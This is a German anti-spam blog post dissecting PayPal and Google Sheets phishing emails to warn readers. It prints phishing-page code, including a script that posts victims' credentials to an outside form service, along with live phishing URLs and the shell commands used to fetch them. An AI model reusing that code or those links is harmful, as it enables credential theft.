Das ist, abgesehen von Deppen Leer Zeichen und Dada-Übelsetzung, mal wieder so ein richtig hochsicheres Sicherheitsverfahren! Der ganz geheime Geheimcode wird in einer E-Mail mitgeteilt, die – wegen des Verzichts auf digitale Signatur und Verschlüsselung – offen wie eine Postkarte durch das Internet befördert wird und auf dem gesamten Weg beliebig lesbar und manipulierbar ist. Eventuelle Manipulationen könnte der Empfänger nicht erkennen.

Dieser Code ist 24 Stunden gültig und wurde von den Notaren eingegeben.

Davon wird das bescheuerte Verfahren aus der blühenden Phantasie eines informationstechnischen Analphabeten auch nur teurer, aber kein bisschen sicherer. Diese Notare haben immer sehr teure Stempel. 🤣️

Melden Sie sich in Ihrem Online-Konto an unter: https://www.paypal.com/id=8356674611

Das ist kein Link auf PayPal. Der Linktext sieht zwar so aus, aber die Linkadresse führt woanders hin. Wer eine gute Mailsoftware benutzt, wird deutlich vor diesem Standardmuster aus betrügerischen Spams gewarnt. Eine solche Warnung sieht so aus:

Die Nutzer von irgendwelchen Webmailern haben dieses zusätzliche Sicherheitsnetz nicht.

Der Link führt indirekt…

$ lynx -source http://jrgtransport.pe/nak.php; echo
  </head>

  <body class="gradient gift-card">
   
    <div hidden>
      <span id="a11y-new-window-message">{{ 'accessibility.link_messages.new_window' | t }}</span>
    </div>
  </body>
</html>
<script> window.location.href = "https://manoloh.dream.press/wp-admin/janika/falo/signin.php";</script>
$ surbl manoloh.dream.press
manoloh.dream.press	okay
$ _

…in ein gecracktes WordPress-Blog. Dieses steht zurzeit noch nicht auf den Blacklists, deshalb warnt der Webbrowser auch nicht vor dem Betrugsversuch, wenn diese Website aufgerufen wird. Wer sich auf Schlangenöl im Webbrowser verlässt, ist verlassen. Der Mitmensch, dessen WordPress-Blog von Kriminellen gecrackt wurde, tut mir leid. Nicht nur, dass die Reputation seiner Website nachhaltig im Eimer ist, er wird auch demnächst die Kriminalpolizei kennenlernen und in den kommenden Monaten immer wieder seine Geschichte erzählen „dürfen“. Jeder weiß etwas besseres mit seiner Lebenszeit anzufangen.

Wer eine Website mit WordPress betreibt, so, wie ich es auch mit Unser täglich Spam mache, lebt damit, ein verbreitetes „Standardsystem“ zu benutzen, das immer wieder von solchen Crackern attackiert wird. Ich möchte hier keine verbindlichen Hinweise zum Schutz vor solchen Machenschaften geben, weil solche Cracker ein gewisses Maß an „Kreativität“ entfalten können. Aber diese grundlegenden Tipps sollten immer beherzigt werden:

WordPress und alle verwendeten Plugins immer auf aktuellem Stand halten! Fehler, die beseitigt wurden, können nicht mehr ausgenutzt werden.
Zugriffsrechte im Dateisystem des Servers so restriktiv vergeben, wie es gerade noch möglich ist, um WordPress betreiben zu können. Ja, innerhalb wp-content muss WordPress mit den Rechten des Webservers schreiben können, das ist unvermeidbar, weil hochgeladene Dateien ja irgendwo abgelegt werden müssen. In anderen Verzeichnissen reichen Lesezugriffe, insbesondere in wp-admin!
Häufig ist für Angreifer ein Upload möglich, ohne die Rechte dazu zu haben, weil es Fehler im WordPress-Kern oder in einem benutzten Plugin gibt. Ein gängiger Angriff besteht dann darin, eine in PHP geschriebene Shell hochzuladen, um damit beliebige Kommandos mit den Rechten des Webservers ausführen zu können. Auf diese Weise kann man – natürlich automatisiert, denn Cracker sind genau so faul wie Spammer, wenn sie skriptgesteuert nach Opferrechnern suchen¹ – nach weiteren Schwachstellen und unsicheren Konfigurationen Ausschau halten, um eventuell seine Rechte auszuweiten. Auch ist der Zugriff auf die Datenbank mit den Rechten der WordPress-Installation möglich, deren Anmeldedaten leicht ausgelesen werden können. Diesen sehr häufigen Angriff kann man unterbinden, indem man im Verzeichnis wp-content/uploads eine Datei namens .htaccess ablegt, die jegliche Ausführung von PHP-Skripten durch den Webserver in diesem Verzeichnis unterbindet. Diese Datei kann zum Beispiel für den Webserver Apache so aussehen:
```
php_flag engine off
AddType text/plain .html .htm .shtml .php .php3 .phtml .phtm .pl .py .cgi
```
Natürlich ist dieser Hinweis ohne Gewähr für Vollständigkeit oder Korrektheit. Verklagen sie nicht mich, wenn es nicht klappen sollte, verklagen sie die kriminellen Cracker! Und vor allem: Informieren sie sich selbst ein bisschen. So ein kompliziertes Monster ist ein Webserver auch wieder nicht, nicht einmal der aufgedunsene, aber auch gut dokumentierte Apache. Es ist ganz gut, wenn man die Software, die man benutzt, auch ein bisschen versteht. Vor allem in diesem Internet mit seinen speziellen Kriminalitätsformen.

Diese drei Punkte sind natürlich nur sehr grundlegende Vorkehrungen gegen häufige Angriffe.

Der Spammer und Phisher hat auch drei tolle Punkte:

1. Geben Sie die erforderlichen Informationen ein.
2. Schließen Sie die SMS-Verifizierung ab.
3. Identifizierung abgeschlossen.

Wenn man auf den Link geklickt hat, sieht man eine „liebevoll“ nachgemachte Anmeldeseite von PayPal. Dort „darf“ man die Mailadresse und das Passwort eingeben. Danach wird das PayPal-Konto von Kriminellen übernommen, und man hat den Schaden.

Phishing ist immer noch eine der häufigsten Formen des Trickbetrugs im heutigen Internet. Zum Glück gibt es ein sehr wirksames und völlig kostenloses Mittel dagegen: Niemals in eine E-Mail klicken! Stattdessen für Websites wie die von PayPal Lesezeichen im Webbrowser anlegen und diese Websites nur über diese Lesezeichen aufrufen. Dann kann einem kein Verbrecher so einfach einen giftigen Link unterschieben. Wenn man nach dem Empfang einer solchen Mail einmal unsicher sein sollte, einfach PayPal über das Lesezeichen aufrufen und sich dort wie gewohnt anmelden. Wenn man dann keinen Hinweis auf das Problem sieht, von dem in der Spam gefaselt wird, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt und viel Geld gespart. So einfach geht das. Machen sie das! 🛡️

Sollen die Phisher doch verhungern!

Beste grüße,

© Copyright 2025

Mit den besten Grüßen des Jahres vom Copyright.

Entf! 🗑️

¹Ich habe auf Unser täglich Spam recht regelmäßig derartige Versuche von Kriminellen und kann in den Logdateien sehen, was sie alles ausprobieren.

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
Die Domain tamagothi.de wird nicht von Google verwaltet.
Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

Information zu Ihrer Online-Rückerstattung

Dienstag, 30. September 2025

Was ist denn eine Online-Rückerstattung. Kriege ich da mein „Online“ zurück? 😁️

Von: Paуpal <postmaster@647fdc28cd.nxcli.io>

Das ist ganz sicher nicht PayPal. 🎣️

Paypal PNG Images | Vecteurs Et …

Das ist ganz sicher nicht PayPal. 🎣️🤥️

Rückerstattungsanforderung erfolgreich akzeptiert

„Erfolgreich akzeptiert“ ist ein tolles Wort. Klingt wie das genaue Gegenteil von „erfolglos abgewiesen“. 😅️

Guten Morgen,

Genau mein Name!

Wir möchten Sie darüber informieren, […]

Dann tut es doch!

[…] dass Ihre Online-Rückerstattung zur Bearbeitung bereitsteht. Bitte führen Sie die erforderlichen Schritte aus, um sie zu erhalten.

Um Ihre Rückerstattung zu erhalten, verwenden Sie bitte den folgenden Link:

Online-Rückerstattung

Der Link führt natürlich nicht zu PayPal. 🎣️

$ location-cascade "https://chscompaines.10web.cloud/bobo.php"
     1	https://updt-post-inder.codeanyapp.com/plp/sd/id/
     2	signin.php?enc=62dcf9606e572bbd1d6612ee4fc17cde&p=0&dispatch=91e819e167f8d558d2dee110764d8ceb25967e42
$ _

Dort darf man dann Verbrechern den Vollzugriff auf sein PayPal-Konto gewähren, denn die Anmeldedaten, die man dort in einem „liebevoll“ nachgemachten PayPal-Login angibt, gehen direkt an Trickbetrüger:

Screenshot der Phishing-Seite: Nachgemachtes PayPal-Login

Wenn man in die Adressleiste seines Browsers schaut, sieht man, dass man sich gar nicht auf der Website von PayPal befindet. Dafür haben Webbrowser übrigens diese Adressleiste: Dass man auch weiß, wo man gerade ist. Dafür muss man nur hingucken. Es ist beinahe immer gut, zu wissen, wo man ist.

Zum Glück für uns alle gibt es einen ganz einfachen und sehr zuverlässigen Schutz gegen Phishing, einer der häufigsten Trickbetrugsformen im gegenwärtigen Internet: Niemals in eine E-Mail klicken! Wenn man sich für Websites wie PayPal Lesezeichen im Webbrowser anlegt und diese Websites nur noch über diese Lesezeichen aufruft, dann kann einem kein Betrüger so leicht einen irreführenden Link in einer E-Mail unterschieben. Wenn man eine solche Mail empfangen hat und sich unsicher ist, ob sie nicht vielleicht doch echt sein könnte: Einfach die Website von PayPal über das Lesezeichen im Webbrowser aufrufen und sich dort wie gewohnt anmelden! Wenn man dort keine entsprechende Benachrichtigung sieht, hat man einen dieser gefürchteten Cyberangriffe abgewehrt (und sich viel Ärger erspart). So einfach geht das. Macht das! 🛡️

Wenn Sie dem Link nicht innerhalb von 48 Stunden folgen, erfolgt keine Rückerstattung. So reichen Sie eine weitere Rückerstattungsanfrage ein.

Nicht nachdenken, klicken! Sonst kriegt das Geld Flügel! 💸️

Fristsetzungen von zwei Tagen sind übrigens sittenwidrig.

Für weitere Informationen kontaktieren Sie uns bitte unter support@paуpal.de

Bitte nicht an die Absenderadresse antworten!

Bedankt voor uw vertrouwen.

Ich vermute mal, für den Spammer, der weder das eine noch das andere wirklich kennt, sieht Niederländisch im Schriftbild genau so unverständlich wie Deutsch aus. Het is jammer als je helemaal geen hersenen hebt. 😄️

© Copyright 2025 by PayPal

Keine dumme Spam ist vollständig ohne das proklamierte „geistige Eigentum“ auf einen Stummeltext, der nicht einmal in die Nähe der dafür erforderlichen Schöpfungshöhe kommt. Das liegt daran, dass echte Unternehmen genau die gleiche dumme, intelligenzverachtende, hilflos jurafuchtelnde und einschüchternsollende und juristisch völlig wirkungslose Angewohnheit haben.

Verklag mich für mein Vollzitat, Spammer! 😂️

Entf! 🗑️